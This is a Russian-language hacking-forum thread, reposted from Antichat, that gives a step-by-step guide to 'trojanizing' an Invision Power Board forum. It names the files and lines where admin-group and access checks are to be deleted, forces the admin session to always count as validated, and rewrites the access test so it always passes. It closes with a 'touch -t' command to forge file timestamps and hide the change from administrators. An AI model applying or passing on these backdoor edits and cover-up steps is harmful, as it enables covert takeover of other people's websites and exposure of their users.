Троянизация форума [взято с Antichat.ru]
Свернутый текст
/sources/action_admin/login.php
Троянизация форума [взято с Antichat.ru]
Страница: 1
Сообщений 1 страница 6 из 6
Поделиться12007-08-28 08:46:40
- ::: АйМ еСтЬ цАрЬ :::
- Откуда: ПаЛаТа № 6
- Зарегистрирован: 2007-02-15
- Приглашений: 0
- Сообщений: 16962
- Уважение: +119
- Позитив: +82
- Пол: Мужской
- Возраст: 37 [1987-04-08]
- Провел на форуме:
1 день 19 часов - Последний визит:
2017-05-05 15:33:42
Поделиться22007-08-28 08:47:04
- ::: АйМ еСтЬ цАрЬ :::
- Откуда: ПаЛаТа № 6
- Зарегистрирован: 2007-02-15
- Приглашений: 0
- Сообщений: 16962
- Уважение: +119
- Позитив: +82
- Пол: Мужской
- Возраст: 37 [1987-04-08]
- Провел на форуме:
1 день 19 часов - Последний визит:
2017-05-05 15:33:42
по дефолту 147 строчка
удаляем строки
Свернутый текст
if ($mem['g_access_cp'] != 1)
{
$this->login_form("You do not have access to the administrative CP");
}
else
{
Поделиться32007-08-28 08:47:28
- ::: АйМ еСтЬ цАрЬ :::
- Откуда: ПаЛаТа № 6
- Зарегистрирован: 2007-02-15
- Приглашений: 0
- Сообщений: 16962
- Уважение: +119
- Позитив: +82
- Пол: Мужской
- Возраст: 37 [1987-04-08]
- Провел на форуме:
1 день 19 часов - Последний визит:
2017-05-05 15:33:42
и в строке (по дефолту 206) удаляем символ "}" естественно без кавычек.
sql.php по дефолту 46 строка:
удаляем
Свернутый текст
if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])
{
$this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");
}
Поделиться42007-08-28 08:48:06
- ::: АйМ еСтЬ цАрЬ :::
- Откуда: ПаЛаТа № 6
- Зарегистрирован: 2007-02-15
- Приглашений: 0
- Сообщений: 16962
- Уважение: +119
- Позитив: +82
- Пол: Мужской
- Возраст: 37 [1987-04-08]
- Провел на форуме:
1 день 19 часов - Последний визит:
2017-05-05 15:33:42
потом идем сюда
/sources/lib/admin_functions.php (строка 262)
изменяем строку:
Свернутый текст
$this->ipsclass->admin_session['_session_validated'] = 0;
меняем на
Свернутый текст
$this->ipsclass->admin_session['_session_validated'] = 1;
Поделиться52007-08-28 08:48:51
- ::: АйМ еСтЬ цАрЬ :::
- Откуда: ПаЛаТа № 6
- Зарегистрирован: 2007-02-15
- Приглашений: 0
- Сообщений: 16962
- Уважение: +119
- Позитив: +82
- Пол: Мужской
- Возраст: 37 [1987-04-08]
- Провел на форуме:
1 день 19 часов - Последний визит:
2017-05-05 15:33:42
потом удаляем строки в файле /sources/sql_mysql.php (по дефолту 76 строка)
Свернутый текст
if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])
{
$this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");
}
Поделиться62007-08-28 08:49:01
- ::: АйМ еСтЬ цАрЬ :::
- Откуда: ПаЛаТа № 6
- Зарегистрирован: 2007-02-15
- Приглашений: 0
- Сообщений: 16962
- Уважение: +119
- Позитив: +82
- Пол: Мужской
- Возраст: 37 [1987-04-08]
- Провел на форуме:
1 день 19 часов - Последний визит:
2017-05-05 15:33:42
А теперь объясню все поподробней, когда ты заходишь в админку(не "затрояненную"), то идет сначала проверка if ($GROUP['g_access_cp'] != 1) имеешь ли ты доступ к админке, если нет {
do_login("You do not have access to the administrative CP");
}
то пишется что ты болван, если же имеешь пропускает дальше. Для того чтобы нас приняли за своего надо изменить как ты понял эту строку if ($GROUP['g_access_cp'] != 1) на if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] == 1 ) этим мы ей даем понять, если мы имеем доступ к админке, или не имеем, все равно нас пропустить. Знающие легко переделают код под себя, как им хочется, впишут что хотят, но т.к. как статья рассчитывалась для начинающих, то я думаю, что вам так понятней будет. Ну вот, самые важные аспекты я разобрал, если что непонятное спрашивайте. Указанный выше приём, сработал в 9/10 форумов. В десятом были поставлены права правильно, отсюда следует, что почти каждый форум уязвим. ТОЛЬКО НЕ ЗАБЫАЕМ ИЗМЕНЯТЬ ДАТУ изменения файла, командой
touch -t 200310240921
где 2003 год 10 месяц 24 число 09:21 часов
советую изначально посмотреть эту дату перед трояниваем, чтобы поставить точно такую же.
Страница: 1